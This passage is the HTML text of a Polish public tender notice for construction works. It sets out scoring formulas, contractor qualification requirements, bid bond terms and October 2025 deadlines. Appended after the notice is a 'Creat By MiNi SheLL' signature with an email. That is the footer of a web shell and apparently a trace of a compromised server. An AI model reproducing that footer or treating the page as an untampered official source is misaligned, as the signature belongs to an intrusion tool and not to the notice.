zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>1) Cena ofertowa (brutto) (C) – waga kryterium 60 pkt;<br/>2) Okres gwarancji (G) – waga kryterium 40 pkt.<br/>2. Zasady oceny ofert w poszczególnych kryteriach: <br/>1) Ocena punktowa kryterium ceny (C) dokonana zostanie zgodnie z formułą: <br/><br/> (Cn) najniższa cena ofertowa brutto* <br/>PC = ------------------------------------------ x waga 60 pkt <br/> (Cb) cena badanej oferty brutto <br/> <br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu <br/><br/>Gdzie:<br/>PC – liczba punktów przyznanych badanej ofercie w ramach tego kryterium<br/>Cn – najniższa z oferowanych cen brutto<br/>Cb – cena brutto badanej oferty<br/>W zakresie kryterium – cena ofertowa brutto – oferta może uzyskać maksymalnie 60 pkt.<br/>Wyliczona punktacja za cenę zostanie zaokrąglona do dwóch miejsc po przecinku.<br/><br/>2) Ocena punktowa w kryterium dotyczącym okresu gwarancji dokonana zostanie zgodnie z formułą:<br/><br/>OKRES GWARANCJI – G<br/>Przyjmuje się, że punkty w tym kryterium będą przyznawane następująco:<br/><br/>Udzielona gwarancja	Ilość punktów<br/>36 miesiące (wymagane)	0<br/>42 miesiące	10<br/>48 miesięcy	20<br/>54 miesięcy	30<br/>60 miesięcy 40<br/><br/>Jeżeli Wykonawca poda w formularzu oferty okres gwarancji w latach, Zamawiający przeliczy go na miesiące wg zasady 1 rok = 12 miesięcy.<br/>W przypadku podania przez Wykonawcę w formularzu oferty krótszego niż wymagany okresu gwarancji, oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust. 1 Ustawy PZP.<br/>Jeżeli Wykonawca nie poda (nie wpisze) w formularzu oferty okresu gwarancji, Zamawiający przyjmie do oceny minimalny (wymagany) 36-miesięczny okres gwarancji, a w przypadku wyboru oferty Wykonawcy okres ten zostanie uwzględniony w umowie.<br/>Jeżeli Wykonawca przedstawi okres gwarancji inny niż punktowane okresy gwarancji wymienione w tabeli, to punkty będą przyznane za osiągnięcie pułapu punktowanych liczby miesięcy, tj. np. za 47 miesiące Wykonawca otrzyma 10 punktów, a do umowy zostanie przyjęty okres gwarancji zgodnie ze złożoną ofertą.<br/>Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 60 miesięcy, Zamawiający do oceny ofert przyjmie okres 60 miesięcy, a w przypadku wyboru oferty Wykonawcy, do umowy zostanie przyjęty okres gwarancji zgodnie ze złożoną ofertą.<br/><br/>1)	ŁĄCZNA OCENA OFERTY:<br/>Zamawiający uzna za najkorzystniejszą ofertę, która uzyskała najwyższą ilość punktów za sumę wszystkich kryteriów wg wzoru (tj. najwyższą wartość wskaźnika W (x):<br/><br/>W(x) = C+ G<br/>gdzie:<br/>W(x) - wskaźnik oceny oferty,<br/>C - ilość punktów przyznana ofercie ,,x” w kryterium ,,Cena ofertowa”,<br/>G - ilość punktów przyznana ofercie ,,x” w kryterium ,,Okres gwarancji”.<br/><br/>3.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. <br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny. <br/>5 Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu. <br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym: <br/> Zamawiający nie stawia warunku w powyższym zakresie. <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/> Zamawiający nie stawia warunku w powyższym zakresie. <br/>3)	sytuacji ekonomicznej lub finansowej Wykonawcy: <br/> Wykonawca musi wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę<br/> 1.000.000,00 zł. <br/>4)	zdolności technicznej lub zawodowej Wykonawcy: <br/>Wykonawca musi wykazać się wiedzą i doświadczeniem, w wykonaniu w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 2 robót budowlanych, każda o wartości minimum 900.000,00 zł brutto za zadanie, odpowiadające swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty. <br/>3.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców. <br/>4.	Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw wykluczeniu z postępowania – zgodnie z załącznikiem nr 2 i nr 3 do SWZ.<br/>2. Informacje zawarte w oświadczeniu, o którym mowa w ust. 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega<br/>wykluczeniu oraz spełnia warunki udziału w postępowaniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w<br/>postępowaniu oraz o braku podstaw wykluczeniu z postępowania<br/>– zgodnie z załącznikiem nr 2 i nr 3 do SWZ.<br/>2. Informacje zawarte w oświadczeniu, o którym mowa w ust. 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega<br/>wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych i przedmiotowych środków dowodowych.<br/>4. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą,<br/>który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej – załącznik nr 5 do SWZ;<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>3) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich<br/>rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów<br/>określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - załącznik nr 6 do SWZ;<br/>4) Opłacona polisa lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę 1.000.000,00 zł.<br/>5) Oświadczenie o zatrudnieniu osób na podstawie umowy o pracę – załącznik nr 6a do SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> pełnomocnictwa <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości łącznej: 19.000,00 zł (słownie: dziewiętnaście tysięcy złotych 00/100); <br/>2.	Wadium wnosi się przed upływem terminu składania ofert tj. do dnia 13.10.2025 r. do godziny 10:00. <br/>3.	Wadium może być wnoszone w jednej lub kilku następujących formach: <br/>1)	pieniądzu; <br/>2)	gwarancjach bankowych; <br/>3)	gwarancjach ubezpieczeniowych; <br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299). <br/>4.	Wadium w formie pieniądza należy wnieść przelewem na konto w Banku: Bank Spółdzielczy w Trzebnicy nr rachunku 95 9591 0004 2001 0000 4776 0001 z dopiskiem „Wadium – nr postępowania”. <br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego. Wadium wnosi się przed upływem terminu składania ofert tj. do dnia 13.10.2025 r. do godziny 10:00 i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP. <br/>5.	Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania: <br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie PZP. <br/>2)	z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium; <br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie; <br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą <br/>(z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>5)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania; <br/>6)	beneficjentem poręczenia lub gwarancji jest: Zamawiający. <br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 PZP.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum); <br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP. zostanie odrzucona. <br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach<br/>określonych we wzorze umowy, stanowiącym Załącznik nr 11 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie<br/>uregulowanym w art. 454-455 PZP. oraz wskazanym we wzorze umowy, stanowiącym Załącznik nr 11 do SWZ.<br/>4. Zmiana umowy wymaga pod rygorem nieważności zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/drogi_trzebnica</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-13 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-11</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com